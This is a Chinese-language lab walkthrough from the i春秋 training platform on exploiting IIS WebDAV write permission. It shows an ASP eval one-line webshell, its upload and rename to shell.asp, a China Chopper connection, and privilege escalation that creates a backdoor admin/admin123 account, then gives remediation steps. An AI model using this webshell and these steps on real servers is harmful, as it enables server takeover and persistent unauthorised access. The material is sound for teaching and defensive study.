i春秋實驗--IIS寫權限漏洞利用


http://www.ichunqiu.com/vm/69/1

目標網址:172.16.12.2

1、掃描目標IIS寫入權限

打開瀏覽器,輸入172.16.12.2回車顯示是“建設中的IIS服務器”

打開IISPutScanner.exe應用掃描服務器,輸入startIP172.16.12.2和endIP172.16.12.2(也可以掃描整個網段),點擊Scan進行掃描,如PUT現實為YES則表明服務器存在IIS寫權限漏洞。

2、利用IIS寫權限寫入webshell

  1)在桌面寫asp一句話:<%eval request("123")%> 密碼為123,保存為1.txt

  2)使用IISWrite.exe軟件,利用IIS寫權限漏洞寫入一句話木馬

  

  點擊提交數據包之前查看是否存在/test.txt文件,如不存在則點擊提交數據包,系統會自動將提交的一句話木馬生成test.txt文件。  

         

  

   提交數據包后系統自動生成test.txt,內容為上傳的一句話木馬。

  

  test.txt里面的內容雖是一句話,但格式是.txt而不是.asp,所有需要使用IISWrite.exe中copy功能復制一份數據,數據名為shell.asp。此時訪問172.16.12.2/shell.asp發現訪問成功, 說明復制成功。

  

   

  使用中國菜刀連接http://172.16.12.2/shell.asp 密碼123獲取webshell

  

  提權:

  systeminfo顯示只安裝了一個補丁,所以可以嘗試iis提權。

  上傳提權工具,iis6.exe pr.exe 3389.exe cmd.exe 

  

   

  提升權限后,iis6.exe 3389(3389.exe默認打開服務器3389端口並新建用戶admin,密碼admin123並添加至管理員權限)

3、寫權限漏洞修補

  1)關閉WebDAV

  

      

  2)網站權限中來賓權限只保留讀寫權限

  

  

  使用IISPutScanner測試,PUT顯示為NO;

  

  使用IISWrite測試,提示501

  

  說明漏洞修復成功。

  

  

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM